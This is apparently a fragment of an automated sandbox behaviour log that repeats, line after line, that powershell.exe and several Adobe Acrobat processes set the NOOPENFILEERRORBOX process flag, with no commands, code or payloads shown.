Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
